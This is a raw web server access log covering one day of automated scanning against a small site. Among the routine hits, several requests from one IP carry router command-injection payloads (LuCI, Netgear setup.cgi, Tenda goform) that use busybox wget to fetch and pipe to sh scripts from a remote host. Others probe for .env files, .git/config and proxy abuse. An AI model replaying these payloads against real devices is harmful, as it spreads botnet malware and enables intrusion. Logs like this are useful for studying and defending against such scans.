176.65.148.2 - - [07/Sep/2025:00:10:17 +0200] "CONNECT 185.65.245.10:7227 HTTP/1.1" 400 804 45.135.193.253 - - [07/Sep/2025:00:34:46 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.68 - - [07/Sep/2025:00:50:32 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.68 - - [07/Sep/2025:00:50:36 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.68 - - [07/Sep/2025:00:50:36 +0200] "GET /favicon.ico HTTP/1.1" 404 729 206.168.34.68 - - [07/Sep/2025:00:50:41 +0200] "GET /favicon.ico HTTP/1.1" 404 729 206.168.34.68 - - [07/Sep/2025:00:50:42 +0200] "GET /security.txt HTTP/1.1" 404 730 152.53.209.147 - - [07/Sep/2025:01:08:19 +0200] "GET / HTTP/1.1" 200 1895 152.53.209.147 - - [07/Sep/2025:01:08:20 +0200] "POST /HNAP1/ HTTP/1.1" 404 728 45.88.186.32 - - [07/Sep/2025:01:21:11 +0200] "POST /tmUnblock.cgi HTTP/1.1" 404 731 45.88.186.32 - - [07/Sep/2025:01:21:11 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.88.186.32 - - [07/Sep/2025:01:21:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756 45.88.186.32 - - [07/Sep/2025:01:21:11 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1" 404 727 45.88.186.32 - - [07/Sep/2025:01:21:11 +0200] "GET null HTTP/1.1" 400 1994 45.88.186.32 - - [07/Sep/2025:01:21:12 +0200] "POST /apply_sec.cgi HTTP/1.1" 404 731 45.88.186.32 - - [07/Sep/2025:01:21:12 +0200] "POST /goform/mp HTTP/1.1" 404 731 45.88.186.32 - - [07/Sep/2025:01:21:12 +0200] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749 45.88.186.32 - - [07/Sep/2025:01:21:12 +0200] "POST /goform/setPingInfo HTTP/1.1" 404 740 45.88.186.32 - - [07/Sep/2025:01:21:12 +0200] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 45.88.186.32 - - [07/Sep/2025:01:21:12 +0200] "POST /diagnostic.php HTTP/1.1" 404 732 45.88.186.32 - - [07/Sep/2025:01:21:12 +0200] "GET / HTTP/1.1" 200 1895 45.88.186.32 - - [07/Sep/2025:01:21:12 +0200] "GET /HNAP1/ HTTP/1.1" 404 728 45.88.186.32 - - [07/Sep/2025:01:21:13 +0200] "POST /goform/SystemCommand HTTP/1.1" 404 742 165.227.55.4 - - [07/Sep/2025:01:28:37 +0200] "GET / HTTP/1.1" 200 1895 165.227.55.4 - - [07/Sep/2025:01:28:41 +0200] "GET /favicon.ico HTTP/1.1" 404 729 213.16.152.131 - - [07/Sep/2025:01:45:29 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.53 - - [07/Sep/2025:01:50:51 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.53 - - [07/Sep/2025:01:50:54 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.53 - - [07/Sep/2025:01:50:54 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.53 - - [07/Sep/2025:01:50:58 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.53 - - [07/Sep/2025:01:50:58 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 746 152.53.209.147 - - [07/Sep/2025:01:54:58 +0200] "GET / HTTP/1.1" 200 1895 152.53.209.147 - - [07/Sep/2025:01:54:58 +0200] "POST /HNAP1/ HTTP/1.1" 404 728 205.185.127.70 - - [07/Sep/2025:01:59:44 +0200] "GET /.env.save.19.feb.24 HTTP/1.1" 404 737 196.251.89.45 - - [07/Sep/2025:03:08:34 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 152.53.209.147 - - [07/Sep/2025:03:18:30 +0200] "GET / HTTP/1.1" 200 1895 152.53.209.147 - - [07/Sep/2025:03:18:31 +0200] "POST /HNAP1/ HTTP/1.1" 404 728 45.95.147.173 - - [07/Sep/2025:03:47:48 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 209.38.128.112 - - [07/Sep/2025:03:48:19 +0200] "-" 400 1930 45.135.193.253 - - [07/Sep/2025:03:56:15 +0200] "GET / HTTP/1.1" 200 1895 205.185.127.70 - - [07/Sep/2025:04:24:54 +0200] "GET /.env.production.orig HTTP/1.1" 404 738 152.53.209.147 - - [07/Sep/2025:04:47:16 +0200] "GET / HTTP/1.1" 200 1895 152.53.209.147 - - [07/Sep/2025:04:47:16 +0200] "POST /HNAP1/ HTTP/1.1" 404 728 185.169.4.150 - - [07/Sep/2025:04:49:16 +0200] "GET / HTTP/1.1" 200 1895 209.38.145.167 - - [07/Sep/2025:04:58:07 +0200] "-" 400 1930 209.38.145.167 - - [07/Sep/2025:04:58:08 +0200] "-" 400 1930 209.38.145.167 - - [07/Sep/2025:04:58:08 +0200] "GET / HTTP/1.1" 200 1895 209.38.145.167 - - [07/Sep/2025:04:58:08 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 209.38.145.167 - - [07/Sep/2025:04:58:09 +0200] "GET /get.php HTTP/1.1" 404 725 64.62.197.77 - - [07/Sep/2025:05:44:11 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.81 - - [07/Sep/2025:05:44:44 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.85 - - [07/Sep/2025:05:45:00 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.84 - - [07/Sep/2025:05:45:11 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 64.62.197.77 - - [07/Sep/2025:05:45:24 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 194.0.234.12 - - [07/Sep/2025:06:16:13 +0200] "-" 400 1930 198.235.24.126 - - [07/Sep/2025:06:25:08 +0200] "GET / HTTP/1.0" 200 1895 161.97.86.210 - - [07/Sep/2025:06:41:51 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 81.171.72.28 - - [07/Sep/2025:06:46:48 +0200] "GET / HTTP/1.1" 200 1895 45.135.193.253 - - [07/Sep/2025:06:47:17 +0200] "GET / HTTP/1.1" 200 1895 45.38.44.221 - - [07/Sep/2025:06:49:04 +0200] "GET /login HTTP/1.1" 404 723 205.185.127.70 - - [07/Sep/2025:06:50:53 +0200] "GET /.env.prod3 HTTP/1.1" 404 728 204.76.203.29 - - [07/Sep/2025:07:07:02 +0200] "CONNECT cfdump.packetsdatabase.com:443 HTTP/1.1" 400 804 152.53.209.147 - - [07/Sep/2025:07:14:39 +0200] "GET / HTTP/1.1" 200 1895 152.53.209.147 - - [07/Sep/2025:07:14:39 +0200] "POST /HNAP1/ HTTP/1.1" 404 728 176.65.149.162 - - [07/Sep/2025:07:27:36 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 3.131.215.38 - - [07/Sep/2025:08:11:04 +0200] "GET / HTTP/1.1" 200 1895 142.93.3.4 - - [07/Sep/2025:08:15:25 +0200] "-" 400 1930 142.93.3.4 - - [07/Sep/2025:08:15:25 +0200] "-" 400 1930 142.93.3.4 - - [07/Sep/2025:08:15:25 +0200] "-" 400 1930 142.93.3.4 - - [07/Sep/2025:08:15:25 +0200] "-" 400 1930 142.93.3.4 - - [07/Sep/2025:08:15:25 +0200] "-" 400 1930 3.131.215.38 - - [07/Sep/2025:08:15:26 +0200] "GET / HTTP/1.1" 200 1895 142.93.3.4 - - [07/Sep/2025:08:15:26 +0200] "-" 400 1930 142.93.3.4 - - [07/Sep/2025:08:15:26 +0200] "-" 400 1930 142.93.3.4 - - [07/Sep/2025:08:15:26 +0200] "-" 400 1930 142.93.3.4 - - [07/Sep/2025:08:15:26 +0200] "-" 400 1930 142.93.3.4 - - [07/Sep/2025:08:15:26 +0200] "-" 400 1930 142.93.3.4 - - [07/Sep/2025:08:15:27 +0200] "-" 400 1930 142.93.3.4 - - [07/Sep/2025:08:15:27 +0200] "-" 400 1930 3.131.215.38 - - [07/Sep/2025:08:17:26 +0200] "-" 400 1930 3.131.215.38 - - [07/Sep/2025:08:21:01 +0200] "-" 400 1930 3.131.215.38 - - [07/Sep/2025:08:23:04 +0200] "-" 400 1930 45.153.34.137 - - [07/Sep/2025:08:38:31 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 172.235.181.217 - - [07/Sep/2025:08:48:09 +0200] "GET / HTTP/1.0" 200 1895 172.235.181.217 - - [07/Sep/2025:08:48:15 +0200] "GET / HTTP/1.1" 200 1895 172.235.181.217 - - [07/Sep/2025:08:48:15 +0200] "GET /webui HTTP/1.1" 404 723 172.235.181.217 - - [07/Sep/2025:08:48:15 +0200] "GET / HTTP/1.1" 200 1895 172.235.181.217 - - [07/Sep/2025:08:48:16 +0200] "GET / HTTP/1.1" 200 1895 172.235.181.217 - - [07/Sep/2025:08:48:16 +0200] "GET /favicon.ico HTTP/1.1" 404 729 172.235.181.217 - - [07/Sep/2025:08:48:16 +0200] "GET /owa/ HTTP/1.1" 404 726 172.235.181.217 - - [07/Sep/2025:08:48:16 +0200] "GET /owa/ HTTP/1.1" 404 726 172.235.181.217 - - [07/Sep/2025:08:48:25 +0200] "-" 400 1930 172.235.181.217 - - [07/Sep/2025:08:48:35 +0200] "GET / HTTP/1.0" 200 1895 172.235.181.217 - - [07/Sep/2025:08:48:35 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.38 - - [07/Sep/2025:09:07:50 +0200] "-" 400 1930 196.251.91.11 - - [07/Sep/2025:09:12:49 +0200] "CONNECT 185.65.245.10:7227 HTTP/1.1" 400 804 205.185.127.70 - - [07/Sep/2025:09:17:15 +0200] "GET /.env.prod2 HTTP/1.1" 404 728 205.210.31.53 - - [07/Sep/2025:09:40:08 +0200] "-" 400 1930 205.210.31.53 - - [07/Sep/2025:09:40:08 +0200] "-" 400 1930 45.142.193.123 - - [07/Sep/2025:10:11:05 +0200] "-" 400 1930 89.248.168.227 - - [07/Sep/2025:10:12:35 +0200] "GET /https://'+location.hostname+': HTTP/1.1" 404 764 205.210.31.94 - - [07/Sep/2025:10:42:39 +0200] "GET / HTTP/1.1" 200 1895 37.44.238.92 - - [07/Sep/2025:11:11:16 +0200] "CONNECT 45.9.156.112:22 HTTP/1.1" 400 804 45.135.193.253 - - [07/Sep/2025:11:23:38 +0200] "GET / HTTP/1.1" 200 1895 18.205.243.147 - - [07/Sep/2025:11:30:10 +0200] "GET / HTTP/1.1" 200 1895 205.185.127.70 - - [07/Sep/2025:11:44:28 +0200] "GET /.env.prod1 HTTP/1.1" 404 728 5.182.209.113 - - [07/Sep/2025:11:53:13 +0200] "-" 400 1930 5.182.209.113 - - [07/Sep/2025:11:53:13 +0200] "-" 400 1930 5.182.209.113 - - [07/Sep/2025:11:53:13 +0200] "-" 400 1930 5.182.209.113 - - [07/Sep/2025:11:53:13 +0200] "-" 400 1930 5.182.209.113 - - [07/Sep/2025:11:53:13 +0200] "-" 400 1930 5.182.209.113 - - [07/Sep/2025:11:53:13 +0200] "-" 400 1930 5.182.209.113 - - [07/Sep/2025:11:53:13 +0200] "-" 400 1930 5.182.209.113 - - [07/Sep/2025:11:53:14 +0200] "-" 400 1930 90.151.171.106 - - [07/Sep/2025:11:56:03 +0200] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 804 90.151.171.106 - - [07/Sep/2025:11:56:08 +0200] "-" 400 1930 90.151.171.106 - - [07/Sep/2025:11:56:13 +0200] "GET /?Z79065299362Q1 HTTP/1.1" 200 1895 90.151.171.106 - - [07/Sep/2025:11:56:18 +0200] "-" 400 1930 85.128.80.102 - - [07/Sep/2025:12:46:29 +0200] "GET / HTTP/1.0" 200 1895 176.65.149.157 - - [07/Sep/2025:12:55:58 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 216.180.246.159 - - [07/Sep/2025:13:26:22 +0200] "-" 400 1930 216.180.246.159 - - [07/Sep/2025:13:26:45 +0200] "GET / HTTP/1.1" 200 1895 216.180.246.159 - - [07/Sep/2025:13:30:27 +0200] "-" 400 1930 216.180.246.159 - - [07/Sep/2025:13:30:38 +0200] "GET /favicon.ico HTTP/1.1" 404 729 205.185.127.70 - - [07/Sep/2025:14:12:49 +0200] "GET /.env.pipelines HTTP/1.1" 404 732 194.163.187.110 - - [07/Sep/2025:14:14:10 +0200] "CONNECT www.cloudflare.com:443 HTTP/1.1" 400 804 194.165.16.166 - - [07/Sep/2025:14:28:43 +0200] "-" 400 1930 52.146.21.18 - - [07/Sep/2025:14:51:42 +0200] "-" 400 1930 138.197.116.239 - - [07/Sep/2025:15:07:28 +0200] "-" 400 1930 138.197.116.239 - - [07/Sep/2025:15:07:28 +0200] "-" 400 1930 138.197.116.239 - - [07/Sep/2025:15:07:28 +0200] "GET / HTTP/1.1" 200 1895 138.197.116.239 - - [07/Sep/2025:15:07:28 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 138.197.116.239 - - [07/Sep/2025:15:07:29 +0200] "GET /get.php HTTP/1.1" 404 725 45.88.186.32 - - [07/Sep/2025:15:50:28 +0200] "POST /tmUnblock.cgi HTTP/1.1" 404 731 45.135.193.253 - - [07/Sep/2025:16:04:01 +0200] "GET / HTTP/1.1" 200 1895 45.88.186.32 - - [07/Sep/2025:16:12:54 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.88.186.32 - - [07/Sep/2025:16:37:16 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 205.185.127.70 - - [07/Sep/2025:16:45:39 +0200] "GET /.env.php_dev HTTP/1.1" 404 730 45.88.186.32 - - [07/Sep/2025:16:58:07 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 178.22.24.23 - - [07/Sep/2025:17:09:22 +0200] "-" 400 1930 178.22.24.23 - - [07/Sep/2025:17:09:22 +0200] "-" 400 1930 45.88.186.32 - - [07/Sep/2025:17:33:24 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1" 404 727 206.123.145.234 - - [07/Sep/2025:17:38:59 +0200] "-" 400 1930 196.251.73.24 - - [07/Sep/2025:17:50:36 +0200] "GET /login HTTP/1.1" 404 723 45.88.186.32 - - [07/Sep/2025:17:55:43 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756 45.88.186.32 - - [07/Sep/2025:18:15:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756 34.52.176.247 - - [07/Sep/2025:18:24:16 +0200] "GET / HTTP/1.1" 200 1895 45.88.186.32 - - [07/Sep/2025:18:41:32 +0200] "GET null HTTP/1.1" 400 1994 172.206.225.242 - - [07/Sep/2025:18:53:48 +0200] "GET /actuator/health HTTP/1.1" 404 737 45.88.186.32 - - [07/Sep/2025:19:02:17 +0200] "POST /apply_sec.cgi HTTP/1.1" 404 731 1.83.125.201 - - [07/Sep/2025:19:03:04 +0200] "GET / HTTP/1.1" 200 1895 125.82.242.171 - - [07/Sep/2025:19:03:22 +0200] "GET / HTTP/1.1" 200 1895 111.162.149.51 - - [07/Sep/2025:19:03:24 +0200] "GET /favicon.ico HTTP/1.1" 404 729 205.185.127.70 - - [07/Sep/2025:19:13:19 +0200] "GET /.env-mobilis-backend HTTP/1.1" 404 738 35.216.163.139 - - [07/Sep/2025:19:48:13 +0200] "-" 400 1930 35.216.163.139 - - [07/Sep/2025:19:48:13 +0200] "GET / HTTP/1.1" 200 1895 35.216.163.139 - - [07/Sep/2025:19:48:13 +0200] "-" 400 1930 35.216.163.139 - - [07/Sep/2025:19:48:13 +0200] "GET / HTTP/1.1" 200 1895 35.216.163.139 - - [07/Sep/2025:19:48:13 +0200] "GET /.git/config HTTP/1.1" 404 733 35.216.163.139 - - [07/Sep/2025:19:48:13 +0200] "GET /server-status HTTP/1.1" 404 731 35.216.163.139 - - [07/Sep/2025:19:48:13 +0200] "GET /config.json HTTP/1.1" 404 729 35.216.163.139 - - [07/Sep/2025:19:48:13 +0200] "GET /.env HTTP/1.1" 404 722 35.216.163.139 - - [07/Sep/2025:19:48:13 +0200] "GET /telescope/requests HTTP/1.1" 404 740 35.216.163.139 - - [07/Sep/2025:19:48:13 +0200] "GET /info.php HTTP/1.1" 404 726 178.62.216.207 - - [07/Sep/2025:20:04:40 +0200] "GET / HTTP/1.1" 200 1895 196.251.87.42 - - [07/Sep/2025:20:18:00 +0200] "-" 400 1930 139.59.174.224 - - [07/Sep/2025:20:36:53 +0200] "GET / HTTP/1.1" 200 1895 139.59.174.224 - - [07/Sep/2025:20:36:53 +0200] "GET /favicon.ico HTTP/1.1" 404 729 176.65.149.157 - - [07/Sep/2025:21:18:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.82.77.202 - - [07/Sep/2025:21:32:02 +0200] "GET / HTTP/1.0" 200 1895 205.185.127.70 - - [07/Sep/2025:21:39:09 +0200] "GET /.env_local HTTP/1.1" 404 728 66.132.153.51 - - [07/Sep/2025:22:14:04 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.51 - - [07/Sep/2025:22:14:08 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.51 - - [07/Sep/2025:22:14:08 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.51 - - [07/Sep/2025:22:14:11 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.51 - - [07/Sep/2025:22:14:12 +0200] "GET /robots.txt HTTP/1.1" 404 728 45.38.44.221 - - [07/Sep/2025:22:16:26 +0200] "GET /login HTTP/1.1" 404 723 196.251.89.45 - - [07/Sep/2025:22:24:48 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 20.65.138.97 - - [07/Sep/2025:22:25:08 +0200] "GET / HTTP/1.1" 200 1895 196.251.89.45 - - [07/Sep/2025:22:25:15 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 196.251.89.45 - - [07/Sep/2025:22:25:16 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 206.168.34.65 - - [07/Sep/2025:22:30:04 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.65 - - [07/Sep/2025:22:30:07 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.65 - - [07/Sep/2025:22:30:08 +0200] "GET /favicon.ico HTTP/1.1" 404 729 206.168.34.65 - - [07/Sep/2025:22:30:15 +0200] "GET /favicon.ico HTTP/1.1" 404 729 206.168.34.65 - - [07/Sep/2025:22:30:16 +0200] "GET /wiki HTTP/1.1" 404 722 196.251.66.71 - - [07/Sep/2025:22:53:47 +0200] "-" 400 1930 196.251.69.116 - - [07/Sep/2025:23:25:26 +0200] "-" 400 1930 20.65.184.116 - - [07/Sep/2025:23:30:08 +0200] "-" 400 1930 45.135.193.253 - - [07/Sep/2025:23:31:48 +0200] "GET / HTTP/1.1" 200 1895 45.38.44.221 - - [07/Sep/2025:23:39:24 +0200] "GET /login HTTP/1.1" 404 723